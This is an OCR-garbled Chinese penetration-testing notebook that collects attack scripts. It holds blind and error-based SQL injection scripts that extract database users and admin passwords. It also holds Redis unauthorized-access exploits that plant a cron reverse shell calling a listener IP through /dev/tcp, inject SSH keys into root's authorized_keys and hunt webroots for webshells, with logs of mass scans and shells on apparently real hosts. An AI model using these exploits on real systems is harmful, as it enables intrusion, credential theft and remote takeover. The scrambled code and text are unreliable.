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My Awesome Book 


This file file serves as your book's preface, a great place to describe your book's 
content and ideas. 


SQL 


Mysql 布 尔 襄 注脚 本 


当 茶 个 育 注 点 不 能 使 用 工具 《一 般 有 waf 限 制 ) 的 时 候 ， 可 以 使 用 这 个 脚本 用 于 证 
明 漏洞 的 存在 


! usr/bin/env python 
-*- coding: utf-8 -*- 


import httplib 
import time 
import string 
import sys 
import random 
import urllib 


headers = ('User-Agent': 'Mozilla/5.0 Chrome/28.0.1500.63', L 
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.') 
print "start to retrive MySQL user:' 
user = '' 
for i in range(1, 21): 
for payload in payloads: 
conn = httplib.HTTPConnection('www.example.com', timeout= 
4) #342, host 
s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payloa 
d)) #payload 
conn.request(method='GET', url="/php/1.php?id=1 and %s" 96 
s,headers = headers) #url 
html_header= conn.getresponse().read() 
length-len(html header) 
if length>10000: 
user+=payload 
sys.stdout.write('\r[In progress] %s' % user) 
sys.stdout.flush() 
break 
else: 
prdnt e 
conn.close() 


print '\n[Done]MySQL user is', user 


| mi 


基于 mssql 的 报错 注入 的 脚本 (get) 


在 进行 mssql 注 入 的 时 候 ， 由 于 各 种 各 样 的 原因 ， 我 们 不 能 使 用 工具 进行 值得 获 


取 ， 那 么 可 以 自行 编写 脚本 来 获取 值 ，python 由 于 其 良好 的 抓 取 网 页 的 功能 


家 广泛 使 用 。 


对 于 get 型 的 mssql 的 报错 注入 ,代码 如 下 


#! /usr/bin/ 

env python 
#coding=utf-8 

import re 

import urllib 

import urllib2 

# 从 访问 链接 中 获取 报错 信息 


def getcontent(payload): #RRARAR 
urli-url-"AND ("+payload+")=1 --- " 
content = urllib.urlopen(urli).read() 
print content 
return content 


# 从 报错 回 显 中 提取 数值 
def getdata(content): 
patt = re.compile("nvarchar.*?'(.*?)'.*?int") 
data = patt.findall(content) 
if data: 
return data[0] 
else: 
return None 
# 获 取 当 前 数据 库 名 
def getcurrentdb(): 
payload = 'db name )' 
content = getcontent(payload) 
data = getdata(content) 
print "current db: "+data 
return data 
def gettablename(dbname,n): #RRXZ 


> 被 大 


tablelist1i=[ ] 
for i in range(n): 
payload = "select top 1 name %u0066rom "+dbname+".dbo.sy 
sobjects where xtype='U' and name not in(select top "+str(i)+" 
name %u0066rom "+dbnamet+".dbo.sysobjects where xtype='U' order b 
y name) order by name" 


try: 
content = getcontent(payload) 
data = getdata(content) 
#print data 
if data not in tablelist1: 
tablelist1.append(data) 
else: 
break 
except: 
continue 
print tablelist1 
print '-------------------- : 


def getcolumns(dbname,table,n): # 获 取 列 名 
tablelist2=[ ] 
for i in range(n): 
payload="Select top 1 name %u0066rom "-dbname-".dbo.SysC 
olumns Where id=Object_Id('"+table+"') and name not in (Select t 
op "+str(i)+" Name %u0066rom "+dbname+".dbo.SysColumns Where id= 
Object_Id('"+table+"') order by name) order by name" 
ET 
content = getcontent(payload) 
data = getdata(content) 
if data not in tablelist2: 
tablelist2.append(data) 
else: 
break 
except: 
continue 
print table 
print tablelist2 
print '-------------------- i 
def getvalue(dbname, table, column, n): # 获 取 各 字段 的 值 
tablelist3=[ ] 


for i in range(n): 
payload-"select top 1 "+column+" %u0066rom "+table+" whe 
re "+column+" not in(select top "+str(i)+" "+column+" %u0066r0om 
"+table+" order by id)order by id" 
BEY: 
content = getcontent(payload) 
data = getdata(content) 
if data not in tablelist3: 
tablelist3.append(data) 
else: 
break 
except: 
continue 
print column 
print tablelist3 


if | name == "_ main ": 
urlz"http://www.example/pages/BulletinPage.aspx?id-21" 
global url 


db=getcurrentdb( ) 

gettablename('saa', 200) 

getcolumns(db, 'Admin_Login', 50) 

getvalue(db, 'Admin_Login', 'LoginPwd',50)  ”# 可 自行 选择 注释 ， 只 
留 你 需要 的 那个 函数 进行 值得 获取 


HTTP 请 来 头 信 息 的 注入 
常见 http 可 能 被 污染 的 参数 有 这 些 


User-agent 浏览 器 版 本 (F) 
Referer AK (F) 
X-Forwarded-For 获取 ip (3) 
client ip ”获取 ip (à) 
cookie 获取 cookie 值 (高 ) 


一 . cookie x à 


1. 原 理 : 在 ASP 中 ,request 对 象 获取 客户 端 提交 数据 常用 的 是 get 和 post 两 种 方式 , 同 
时 request 对 象 可 以 不 通过 集合 来 获得 数据 , 即 直 接 使 用 "request(“name")”. 但 它 效 率 
低下 ,容易 出 错 , 当 我 们 省 略 具 体 的 集合 名 称 时 ,asp 是 按 
QueryString(get),Form(post),Cookie,Severvariable, 集 合 的 顺序 来 搜索 的 .cookie 是 
保存 在 客户 端的 一 个 文本 文件 ,可 以 进行 修改 ,这 样 一 来 ,就 可 以 利用 Request.cookie 
方式 来 提交 变量 的 值 ,从 而 利用 系统 的 漏洞 进行 注入 攻击 . 


2. 条 件 1 是 程序 对 get 和 post 方 式 提交 的 数据 进行 了 过 滤 ， 但 未 对 cookie 提 交 的 数据 
库 进行 过 滤 。 条 件 2， 在 1 的 基础 上 还 需要 程序 对 提交 数据 获取 方式 是 直接 
request(“xxx”) 的 方式 ， 未 指明 使 用 request 对 象 的 有 具体 方法 进行 获取 。 


3. 首 先 我 们 需要 找到 一 个 注入 点 ， 如 果 是 使 用 get 方 式 提交 的 参数 ， 要 更 改 成 cookie 
方式 提交 ， 我 们 首先 要 访问 正常 的 存在 注入 点 的 页 面 ， 等 页 面 完 全 打开 之 后 ， 在 开 
发 者 环境 的 console 栏 中 ， 输 入 alert(document.cookie=”id=?+escape(“x")); 这 里 

的 "id=” 便 是 注入 点 中 注入 参数 ，x 便 是 页 面 的 参数 的 数值 了 ， 这 两 处 要 根据 实际 情 
况 来 定义 。 写 完 之 后 按 下 回 车 网 页 中 会 弹出 一 个 对 话 框 现在 更 改 好 了 cookie 后 我 们 
就 要 试 下 能 不 能 正常 访问 了 ， 现 在 在 另外 一 个 窗口 中 重新 打开 那个 注入 点 既是 

将 “id=x” 去 掉 后 的 ， 然 后 看 是 否 能 正常 访问 。 如 果 去 掉 之 后 能 够 继续 访问 那么 说 明 
可 以 进行 cookie 注 入 ， 这 样 就 说 明 程 序 在 使 用 request 对 象 获 取 数 据 的 时 候 并 未 指明 
具体 使 用 什么 方法 来 获取 ， 而 是 直接 使 用 request(“xx") 的 方式 。 


二 . X-Forwarded-For € ^ () 


1.X-Forwarded-For 是 HTTP 头 的 一 个 字段 。 它 被 认为 是 客户 端 通过 HTTP 代 理 或 者 
负载 均衡 器 连接 到 web 服务 端 获 取 源 ip 地 址 的 一 个 标准 。 2.X-Forwarded-For 注 入 常 
见于 检测 用 户 ip 是 否 合法 ， 进 行 sql 查 询 的 时 没有 过 滤 获 取 ip 的 参数 。 3. 利 用 方法 ， 
可 以 用 firefox 中 的 X-Forwarded-For Header 揪 件 。 或 者 将 抓 的 头 信息 的 包 保 存在 
sdqlImap 的 根 路 径 ， 比 如 test.txt，python sqlmap.py -r test.txt level 3 4. 实 

例 : http:/Awww.alexa.cn/ 


三 . User-agent» 


JH PRE (user agent) 是 记录 软件 程序 的 客户 端 信息 的 HTTP 头 字段 ， 他 可 以 用 来 
统计 目标 和 违规 协议 。 在 HTTP 头 中 应 该 包含 它 ， 这 个 字段 的 第 一 个 空格 前 面 是 软 
件 的 产品 名 称 ， 后 面 有 一 个 可 选 的 斜 枉 和 版 本 号 。 并 不 是 所 有 的 应 用 程序 都 会 被 获 
取 到 User-agent 信 息 ， 但 是 有 些 应 用 程序 利用 它 存储 一 些 信 息 (如 : 购物 车 ) 。 在 
这 种 情况 下 ， 我 们 就 有 必要 研究 下 user-agent 头 存在 的 问题 了 。HTTP 查 询 实 例 : 


GET /index.php HTTP/1.1 
Host: [host] 
User-Agent: aaa’ or 1/* 


"Jy. Refereri£ à 

Referer 是 另外 一 个 当 应 用 程序 没有 过 滤 存 储 到 数据 库 时 ， 容 易 发 生 SQL 注 入 的 
HTTP 头 。 它 是 一 个 允许 客户 端 指定 的 可 选 头 部 字段 ， 通 过 它 我 们 可 以 获取 到 提交 
请 求 URI 的 服务 器 情况 。 它 允许 服务 器 产生 一 系列 的 回 退 链接 文档 ， 像 感 兴趣 的 内 
容 ， 日 志 等 。 它 也 允许 跟踪 那些 坏 链接 以 便 维护 。 


例如 : 
GET /index.php HTTP/1.1 
Host: [host] 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537. 


36 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.36 


Referer: http://www. yaboukir.com' 


五 . 防止 消息 头 注入 漏洞 


防止 HTTP 消 息 头 注入 漏洞 的 最 有 效 方法 是 ， 不 将 用 户 控 制 的 输入 插入 到 应 用 程序 
返回 的 HTTP 消 息 头 中 。 通 常 我 们 可 以 用 一 些 较为 安全 的 方法 代替 这 种 行为 。 

如 果 不 可 避免 地 要 在 HTTP 消 息 头 中 插入 用 户 控制 的 数据 ， 那 么 应 用 程序 应 采取 以 
下 这 种 双重 深层 防御 方法 防止 漏洞 产 认 。 应 用 程序 应 根据 情形 ， 对 插入 的 数据 进行 尽 可 
能 严格 的 确认 。 例 如 ， 如 果 根 据 用 户 输入 设 定 一 个 cookie 值 ;那么 应 当 限制 这 个 值 仅 包 
含 字 母 字 符 ， 最 大 长 度 为 6B。 

应 对 插入 消息 头 的 每 一 个 数据 进行 过 滤 ， 检 测 可 能 的 恶意 字符 。 实 际 上 ， 任 何 A 
SCII 码 小 于 9x29 的 字符 都 应 被 视 为 可 疑 的 恶意 字符 ， 应 用 程序 应 拒绝 包含 这 些 字符 的 
请 求 。 通 过 对 所 有 应 用 程序 内 容 使 用 HTTPS， 应 用 程序 即 可 防止 攻击 者 利用 任何 残留 的 
消息 头 注入 漏洞 “毒害 “代理 服务 器 缓存 。 


(ZH IX 


Redis Getshell 自 动 化 实践 之 cron 


利用 流程 


1 通过 redis 未 授权 访问 漏洞 ,向 redis 揪 入 一 条 记录 ,内 容 是 反弹 shell 的 定时 任务 
2 通过 redis 数 据 导 出 功能 ,将 含有 定时 任务 代码 的 数据 导出 到 /var/spool/cron/root 
3 监听 端口 ,获取 shell 


` 


fi 5 exp 


SS 


N 


完整 代码 : 


#!/usr/bin/env python 

# -*- coding: utf-8 -*- 

# author = i@cdxy.me 

# project = https://github.com/Xyntax/POC -T 


redis getshell expliot (/var/spool/cron reverse shell) 


import redis 
from plugin.util import host2IP 
from plugin.util import randomString 


listen_ip = '115.28.1.1' 
listen_port = 9999 


def poc(url): 
url = host2IP(url) 
ip = uürl.split( To] 
port = int(url.split(':')[-1]) if ':' in url else 6379 
Erny: 
r = redis.Redis(host=ip, port=port, db=0, socket_timeout= 


10) 
if 'redis version! in r.info(): 
payload = 'Nnin*/1* * * * /bin/bash -i >& /dev/tcp/ 
(ipi (port) 0>&1\n\n'.format(ip=listen_ip, 


port-str(listen port)) 
path = '/var/spool/cron' 
name - 'root' 
key = randomString(10) 
.set(key, payload) 
.config set('dir', path) 
.config set('dbfilename', name) 
.save() 
.delete(key) # 清除 痕迹 
.config set('dir', '/tmp') 
return True 


make r Re E] 


except Exception, e: 
# print e 
return False 

return False 


ee v] 
和 之 前 的 ssh-key 相 比 简单 了 点 . 


首先 判断 是 否 存 在 未 授权 访问 


r = redis.Redis(host=ip, port=port, db=0, socket_timeout=10) 
if 'redis_version' in r.info(): 


构造 定时 任务 代码 


listen ip = '115.28.1.1' 
listen_ port = 9999 


payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 
O>&1\n\n'.format(ip-listen_ip,port=str(listen port)) 


5 A/var/spool/cron/root 


path = 

name = 

key = randomString(10) 
r.set(key, payload) 
r.config_set('dir', path) 
r.config set('db ename', name) 
r.save() 


r.delete(key) 
r.config set('dir', '/tmp') 


AERARMEA GE e ROSE RA RLY 9] VA dO R AE FRE PCS ping, Ae 
使 用 cloudeye(api 已 集成 到 工具 中 ) 等 dns 日 志 工具 做 验证 . 

测试 加 载 1000 个 ZoomEye 采 集 的 redis 站 点 ,也 可 以 使 用 --api --dork 参 数 直 接 从 
ZoomEye 采 集 


: -/testspace/POC-T$ python POC-T. py -T -t 50 -m redis-cron- getshell - 
data/ redis_us 


/ 
/ 


( Version 1.7.2 by cdxy mail: i@cdxy. me } 


LDL | 11 


umg 


. 188: 6379 


177: 6379 
11 found | 0 remaining | 1000 scanned in 75.13 seconds 





然后 监听 端口 ,一 会 就 会 有 shell 自 动 连 过 来 


root@/28zn6h79xZ: ~# nc 
whoami 

bash: no job control in 
[root ws ~] # whoami 


NS ~])# 1s 





看 下 我 们 之 前 写 入 的 文件 





[ root@ws -] #cd / var/ spool/cron 
cd /var/spool/cron 
[root@ws cron]# ls 


[root@ws cron]# cat root 
cat root 
REDIS0006@&rackitA@ 


ssh- rsa AAAAB3NzaC1 yc2EAAAADAQABAAABAQC6HYEUZt aiLH14RcYqlDFYF fEg0 ads Q 
KTY2/ 7UUXhGRCuqgzWY o7 SNRVwUJZWcsL x34RG5 de3LbZ j 5Q* I VAvAEOKUuKNXF/ OALSHUE 
1c3z/ mOV2mGPZRZ17y1CykSOn4gY4P5KwC8wZ24 xRUAenOY *6 JxczoduAt Iseh7HNWZ2E 


bmopgt qeyl< 


*/1 * * * * /bin/bash -i >& /dev/tcp 


rjhcqxzsgy (o 


*/1 * * * * /bin/bash -i >& /dev/tcp 





$6061 I root@vs cron] * li 


Redis Getshell 自 动 化 实践 之 SSH key 


不 了 解 该 漏洞 建议 先 看 这 个 文章 Redis 未 授权 访问 配合 SSH key 文件 利用 分 析 


漏洞 利用 流程 


1 生成 一 对 用 于 ssh 验 证 的 密 钥 对 

2 通过 redis 未 授权 访问 漏洞 ,向 redis 插 入 一 条 记录 ,内 容 为 已 生成 的 公 铀 

3 通过 redis 数 据 导 出 功能 ,将 含有 公 负 的 数据 导出 到 /root/.ssh/authorized_keys 
4 使 用 自己 的 主机 ,通过 ssh 私 钥 与 受害 机 进行 匹配 并 登入 


自动 化 的 限制 


用 exp 做 自动 化 getshell 的 限制 主要 有 以 下 几 点 : 
1 以 root 用 户 运行 Redis, 且 未 设置 安全 策略 

2 Linux,port 22, 且 无 防火 墙 

3 ssh 配 置 支持 该 登录 方式 


编写 exp 


协议 分 析 及 Payload 构 造 
发 送 一 条 info 命 令 


xy@kali:~$ redis-cli -h 42.62.xxx.xxx 
42.62.XXX.XXX:6379> info 

# Server 

redis_version:3.0.7 
redis_git_sha1:00000000 
redis_git_dirty:0 
redis_build_id:738a2bf67b2f8a28 
redis_mode:standalone 


Redis Getshell 自 动 化 实践 之 SSH key 


使 用 wireshark 抓 包 分 析 协 议 格式 
Filter: [epstemeds expression. Clear Apply 


Time Source ‘Destination Protocol Length Info 








Follow TCP Stream (tcp.strear 


{Stream Content 
In 





No. 














$4 

infb 

$1782 

# Server 

redis version:2.8.13 
redis git shal:00000000 
redis git dirty:O 













18.17959000 10.0.5.178 203.156.197.51 


316 24.59408100 203.156.197.51 10.0.5.178 TCP 68 6379542655 [ACK] Seq-1 Ack 
317 24.59516200 203.156.197.51 10.0.5.178 TCP 1504 6379-42655 [ACK] Seq-1 Ack 


318 24.59516200 203.156.197.51 10.0.5.178 TCP 423 6379-42655 [PSH, ACK] Seq redis build id:c8aasbo4aesb44db 
319 24.59522600 10.0.5.178 203.156.197.51 TCP 66 42655-6379 [ACK] Seq-15 Ad redis mode:standalone . 
320 24,59524000 10.0.5.178 203.156.197.51 TCP 66 4265546379 [ACK] Seq=15 Agios: Einux 3-8.0-31- generic x86_64 


arch_bits:64 

multiplexing api:epoll 

gcc version:4.6.3 

process id:1473 

run id:c79cbf 2f 9f 17a1d94f c2957b189d13b3532167f9 
tcp. port:6379 

uptime in seconds:7407532 
uptime in days:85 

hz:10 

lru clock:9379921 

config file:/etc/redis/redis.conf 


# Clients 















[Calculated window size: 29696] 
[window size scaling factor: 1024] 
Checksum: OxaOb6 [validation disabled] 
Urgent pointer: O 
* Options: (12 bytes), No-Operation (NOP), No-Operation (NOP), Timestamps 
» No-Operation (NOP) 
» No-Operation (NOP) 
» Timestamps: TSval 129428, TSecr 1858842422 
» [SEQ/ACK analysis] 
+ Data (14 bytes) 









- 























Entire conversation (1805 bytes) 


JL ILLSESEIALERCAELLGCEBSRLROLLIERLEEELCLLELCLOGLL LHoUüA. 
查找 (F) | 另存 为 (A) | 打印 (P) |O ASCII © EBCDIC 
00 42 49 46 40 00 40 06 50 ee Oa 00 05 b2 cb 9c EME B ES Cat 帮助 (H) [F 


c5 33 a6 9f 18 eb 7e 8a ba 15 81 b3 95 38 80 18 .3....-. . 


OO ld aO b6 OO OO Ol Ol 08 Oa OO Ol f9 94 Ge cb  ... A c 


af 36 31 4 
oM Data (data.data), 14 bytes | Packets: 381 : Displayed: 9 (2.4%) - Dropped: 0 (0.0%) | Profile: De 


#4 3% di payload 




































n. 











payload = "\x2a\x31\xOd\x0a\x24\x34\xO0d\x0a\x69\x6e\x66\x6f\xod\ 
x0a' 


这 样 就 能 检测 出 未 授权 访问 漏洞 了 , 例如 这 个 Seebug 提 供 的 PoC: 
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def _verify(self): 

result = {} 

payload = '\x2a\x31\xOd\x0a\x24\x34\x0d\x0a\x69\x6e\x66\ 
x6f\xOd\x0a' 

S = socket.socket() 

socket.setdefaulttimeout (10) 


try: 
host = urlparse.urlparse(self.url).netloc 
port = 6379 
s.connect((host, port)) 
s.send(payload) 
recvdata = s.recv(1024) 
if recvdata and 'redis_version' in recvdata: 
result['VerifyInfo'] = {} 
result['VerifyInfo']['URL'] = self.url 
result['VerifyInfo']['Port'] = port 
except: 
pass 
s.close() 


return self.parse attack(result) 


我 们 可 以 仿造 这 个 思路 编写 exp, 只 需要 抓 取 -> 分 析 -> 按 规则 构造 各 个 必要 的 请 求 包 ， 


并 判断 返回 字段 , 像 这 样 : 
00000021 2a 34 Od Oa 24 36 Od Oa 63 6f 6e 66 69 67 Od Oa *4..$6.. config.. 
00000031 24 33 Od Oa 73 65 74 Od Oa 24 33 Od Oa 64 69 72 $3..set. .$3..dir 
00000041 Od Oa 24 31 30 Od Oa 2f 72 6f 6f 74 2f 2e 73 73 ..$10../ root/.ss 
00000051 68 Od Oa Pe: 
00000000 2d 45 52 52 20 43 68 61 6e 67 69 6e 67 20 64 69 -ERR Cha nging di 
00000010 72 65 63 74 6f 72 79 3a 20 50 65 72 6d 69 73 73 rectory: Permiss 
00000020 69 6f 6e 20 64 65 6e 69 65 64 Od Oa ion deni ed.. 
00000054 2a 34 Od Oa 24 36 Od Oa 63 6f 6e 66 69 67 Od Oa *4..$6.. config.. 
00000064 24 33 Od Oa 73 65 74 Od Oa 24 31 30 Od Oa 64 62 $3..set. .$10..db 
00000074 66 69 6c 65 6e 61 6d 65 Od Oa 24 31 35 Od Oa 61 filename ..$15..a 
00000084 75 74 68 6f 72 69 7a 65 64 5f 6b 65 79 73 Od Oa uthorize d keys.. 


O000002C 2b 4f 4b Od Oa +OK.. 
00000094 2a 31 Od Oa 24 34 Od Oa 73 61 76 65 Od Oa *1..94.. Save... 
00000031 2b 4f 4b Od Oa +OK.. 


利用 Python-redis 库 
这 就 比较 简单 了 . 


首先 判断 是 否 存在 未 授权 访问 漏洞 


NO 
O 


r = redis.Redis(host=ip, port=port, db=0) 
if 'redis version' in r.info(): 


然后 执行 redis 命 令 ,将 公 钥 写 入 目标 位 置 


r.set(randomString(10), '\n\n' + public key + '\n\n') 
r.config set('dir', '/root/.ssh') 

r.config set('dbfilename', 'authorized keys') 
r.save() 


之 前 要 判断 目标 22 端 口 是 否 开放 


def checkPortTcp(target, port): 
sk = socket.socket(socket.AF_INET, socket.SOCK STREAM) 
sk.settimeout (10) 
Eny: 
sk.connect((target, port)) 
return True 
except Exception: 
return False 


最 后 对 ssh 做 连接 测试 


def testConnect(ip, port=22): 
try: 
s = paramiko.SSHClient() 
s.load system host keys() 
s.connect(ip, port, username='root', pkey-private key, t 
imeout-10) 
s.close() 
return True 
except Exception, e: 
if type(e) == SSHException: 
return True 
return False 


完整 exp 代 码 


#!/usr/bin/env python 

# -*- coding: utf-8 -*- 

# author = i@cdxy.me 

# project = https://github.com/Xyntax/POC-T 


redis getshell expliot (ssh authorized_keys) 


import redis 

import paramiko 

from plugin.util import host2IP 

from plugin.util import randomString 

from plugin.util import checkPortTcp 

from paramiko.ssh_exception import SSHException 


public_key = 'ssh-rsa =====' 


private key = """ 


import time 


def poc(url): 

url - host2IP(url) 
ip = url.split(':')[0] 
port = int(url.split(':')[-1]) if ':' in url else 6379 
Ery: 

if not checkPortTcp(ip, 22): 

return False 
r = redis.Redis(host=ip, port=port, db=0) 
if 'redis version” in r.info(): 


key = randomString(10) 
r.set(key, '\n\n' + public key + '\n\n') 
r.config set('dir', '/root/.ssh') 
r.config set('dbfilename', 'authorized keys') 
r.save() 
r.delete(key) # FR 
r.config_set('dir', '/tmp') 
time.sleep(5) 
if testConnect(ip, 22): 
return True 
except Exception, e: 
# print e 
return False 
return False 


def testConnect(ip, port=22): 
ery: 
s = paramiko.SSHClient() 
s.load_system_host_keys() 
s.connect(ip, port, username='root', pkey=private_key, t 
imeout=10) 
s.close() 
return True 
except Exception, e: 
if type(e) == SSHException: 
return True 
return False 


批量 检测 从 ZoomEye 获 取 100 个 结果 并 使 用 我 们 编写 的 脚本 进行 验证 ,效果 如 下 


: ~/ testspace/ POC- T$ python POC-T. py -T -t 50 -m redis- sshkey- getshell - 
api --dork "port 6379" --max-page 10 --nF 


Version 1.7.2 by cdxy mail: i@cdxy. me } 


ot 


93: 6379 
186: 6379 
9: 6379 
237: 6379 
. 96: 6379 
. 90: 6379 
18: 6379 





7 found | 0 remaining | 98 scanned in 10.37 seconds 
这 里 paramiko 的 ssh 连 接 有 个 问题 ,并 没有 做 到 100% 无 误 报 . 接 下 来 可 以 手动 测试 一 
下 是 否 可 以 登入 ssh 


事实 上 跑 了 一 定数 据 之 后 ,觉得 收获 不 如 预期 ,毕竟 这 个 漏洞 可 以 灵活 的 控制 的 因素 
KS. 


前 两 篇 文章 介绍 了 两 种 直接 root 权 限 getshell 
的 方式 ,这 里 介绍 通过 写 入 Webpage 来 得 到 
shell 的 半自动 化 脚本 . 

前 两 篇 文章 介绍 了 两 种 直接 root 权 限 getshell 的 方式 ,这 里 介绍 通 
过 写 入 Webpage 来 得 到 shell 的 半自动 化 脚本 . 


脚本 的 意义 是 将 误 报 的 可 能 性 降 到 最 低 ,发 现 目标 并 简化 手工 操作 . 


利用 流程 


1 通过 redis 未 授权 访问 漏洞 ,向 redis 插 入 一 条 记录 ,内 容 是 一 匈 话 木马 或 其 他 
webshell 

2 找到 web 绝 对 路 径 , 写 入 webshell 

3 菜刀 或 其 它 


半自动 化 exp 逻 和 辑 
半自动 的 原因 是 最 后 写 入 的 Webshell 需 要 手工 控制 


脚本 会 顺序 检查 以 下 必要 条 件 : 1 判断 该 主机 是 否 存在 web 服 务 
2 判断 该 主机 是 否 存 在 Redis 未 授权 访问 漏洞 

3 判断 用 户 是 否 有 修改 Redis 配 置 的 权限 

4 爆破 Web 绝 对 路 径 

5 判断 用 户 在 Web 路 径 是 否 有 写 权 限 


如 果 这 些 检查 顺利 通过 ,将 目标 返回 给 渗透 测试 人 员 并 手工 写 入 Webshell 


show me the code 


判断 web 服 务 


for web_port in [80, 443, 8080, 8443]: # 判断 web 服 务 
if checkPortTcp(ip, web_port): 


ERY: 

real_url = redirectURL(ip + ':' + str(web_port)) 
except Exception: 

real_url = ip + ':' + str(web_port) 


break # TODO 这 里 简单 化 处 理 , 只 返回 了 一 个 端口 的 结果 
else: 
return False 


判断 Redis 未 授权 访问 ,并 检查 各 种 exp 必 需 的 操作 是 否 能 正常 执行 . 简单 化 处 理 , 用 
root 用 户 来 保证 对 web 目录 的 写 入 权限 


Eny: 
r = redis.Redis(host=ip, port=port, db=0, socket_timeout= 
5) 
if 'redis_version' not in r.info(): # 判断 未 授权 访问 
return False 
key = randomString(5) 
value = randomString(5) 
r.set(key, value) # 判断 可 写 
r.config set('dir', '/root/') # 判断 对 /var/www 的 写 入 权限 ( 
目前 先 判断 为 root ) 
r.config set('dbfilename', 'dump.rdb') # 判断 操作 权限 
r.delete(key) 
r.save() # 判断 可 寻 出 
except Exception, e: 


return False 





S 


爆破 web 服 务 的 绝对 路 径 


path_list = [] 
for each in ABSPATH_PREFIXES.LINUX: 
Eny: 
r.config_set('dir', each.rstrip('/')) 
path_list.append(each) 
for suffix in ABSPATH_SUFFIXES: 
ERY: 
r.config_set('dir', suffix.rstrip('/')) 
path_list.append(each.rstrip('/') + '/' + su 
ffix) 
except Exception: 
continue 
except Exception: 
continue 


其 中 爆破 的 字典 提取 自 sqlmap 


Redis Getshell 自 动 化 实践 之 WEBSHELL 


Class ABSPATH_PREFIXES : 
LINUX = ( 
"/var/www", "/usr/local/apache", "/usr/local/apache2", 
/usr/local/www/apache22", "/usr/local/www/apache24", 


"/usr/local/httpd", "/var/www/nginx-default", "/srv/www" 


, '/var/www/vhosts", 


"/var/www/virtual", "/var/www/clients/vhosts", "/var/www 


/clients/virtual") 
WINDOWS - ( 


"/xampp", "/Program Files/xampp", "/wamp", "/Program Fil 


es/wampp", "/apache", 
"/Program Files/Apache Group/Apache", 


"/Program Files/Apache Group/Apache2", "/Program Files/A 


pache Group/Apache2.2", 


"/Program Files/Apache Group/Apache2.4", "/Inetpub/wwwro 


Ob, 
"/Inetpub/vhosts" ) 
ALL = LINUX + WINDOWS 


# Suffixes used in brute force search for web server document ro 


ot 
ABSPATH_SUFFIXES = ( 


thin EMEC OCSE, AMEC OCSE pnp. publico = {src ste 


p; "build", "web", "www", "data", "sites/all", 
"www/build" ) 


#!/usr/bin/env python 

# -*- coding: utf-8 -*- 

# author = i@cdxy.me 

# project = https://github.com/Xyntax/POC-T 


redis getshell expliot (/var/spool/cron reverse shell) 


检查 Redis 未 授权 访问 -> 检查 是 否 存在 web 服 务 -> 检查 exp 必 需 的 权限 和 功能 -> 枚 举 绝 
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对 路 径 -> 输 出 结果 供 手 工 测试 


import redis 

from plugin.util import host2IP 

from plugin.util import randomString 

from plugin.util import redirectURL 

from plugin.util import checkPortTcp 

from plugin.static import ABSPATH_PREFIXES, ABSPATH_SUFFIXES 


def poc(url): 
url = host2IP(url) 
ip = url.split(':')[0] 
port = int(url.split(':')[-1]) if ':' in url else 6379 


for web port in [80, 443, 8080, 8443]: # 判断 web 服 务 
if checkPortTcp(ip, web port): 
Eny: 
real_url = redirectURL(ip + ':' + str(web_port)) 
except Exception: 
real_url = ip + ':' + str(web_port) 
break # TODO 这 里 简单 化 处 理 , 只 返回 了 一 个 端口 的 结果 
else: 
return False 


try: 
r = redis.Redis(host=ip, port=port, db=0, socket_timeout= 
5) 
if 'redis version' not in r.info(): # 判断 未 授权 访问 
return False 
key = randomString(5) 
value = randomString(5) 
r.set(key, value) # HKTS 
r.config set('dir', '/root/') # 判断 对 /var/www 的 写 入 权限 ( 
目前 先 判断 为 root ) 
r.config set('dbfilename', 'dump.rdb') # 判断 操作 权限 
r.delete(key) 
r.save() # 判断 可 导出 
except Exception, e: 


return False 


H 枚 举 绝对 路 径 
path_ list = [] 
for each in ABSPATH PREFIXES. LINUX: 
VE 
r.config_set('dir', each.rstrip('/')) 
path_list.append(each) 
for suffix in ABSPATH_SUFFIXES: 
try: 
r.config_ set('dir', suffix.rstrip('/')) 
path_list.append(each.rstrip('/') + '/' + su 
ffix) 
except Exception: 
continue 
except Exception: 
continue 


if len(path list): 

return real url + ' ' + ' '.join(path list) 
else: 

return False 


-/testspace/POC- T$ python POC-T. py -T -m redis-web-probe -f ./data/redis 


Version 1.7.2 by cdxy mail: iGcdxy. me ) 


http: / — 1509: 80 / var/www / var/ www/ html 

/ signup / var/www /vari w/ htn L 

http: / vI html 

http: // 

http: / 

http: // 

http: / es Com/ / var/www / var/www/ html 


7 found | 0 remaining | 500 scanned in 268.94 seconds 


找 一 个 站 , 写 入 test.html 看 看 效果 
ym: redis-cli -h 210 — 77 

210. AERE 77: 6379> config set dir /var/www/html/ default 
(error) ERR Changing directory: No such file or directory 
20 VN : 6379» config set dir /var/www/html/src 
(error) Changing directory: No such file or directory 
210. D. 77: 6379> config set dir /var/wwwhtml/web 
(error) ERR Changing directory: No such file or directory 





MDD 77: 6379> config set dir /var/wwwhtml/ 
OK 

AOA 77: 6379> config set dbfilename test. html 
OK 


A" U 6379> save 
OK 
AU WA | 访问 





F221C 77/test.| x 
4) | [ 210 77 
NA OD 打开 新 的 标签 页 


REDIS0006@crackitA@"\nininssh-rsa 
AAAAB3NzaC lyc2EAAAABIWAAAQEA InEMDr1zHk4eLm9qV8TzhYz9Jv 
john@linux\n\n"@b)P 1? 


test.html 看 来 没有 


问题 ,继续 写 入 webshell 


Vi L ET 


EE KE L 


77:6379> config set dbfilename test. php 


77:6379> save 


77: 6379> | 注 : 图 中 间 那 个 





P$ phpinfo() x 
* > AN 210. 77 


MA 口 打开 新 的 标签 页 


REDIS0006@crackitA@"\nininssh-rsa 


AAAAB3NZzaC1yc2EAAAABIWAAAQEA1nEMDr1zHk4eL m9qV8TzhYz9Jve/gF 1mPKeVfkyD 
john@linux\n\n"shell 


PHP Version 5.4.32 


Linux smartorderentry 2.6.32-279.el6.x86 64 #1 SMP Fri Jun 2: 


Build Date Aug 21 2014 07:34:05 
Server API |Apache 2.0 Handler 


Virtual disabled 
Directory 
Support 


Configuration | /etc 

File (php.ini) 

Path 

Loaded letc/php.ini 


Configuration 
File 


Scan this dir |/etc/php.d 
for additional 






SCTF2016 痛苦 的 渗透 之 路 


SCTF2016 痛苦 的 浴 透 之 路 

0x00 3j à 

ER AY CTF S44 AR ER À > —J3-718 WEBBiIE 类 的 题目 ， 人 这 也 是 痛苦 的 开始 。 好 好 的 
db Byler de AS MS PUB 

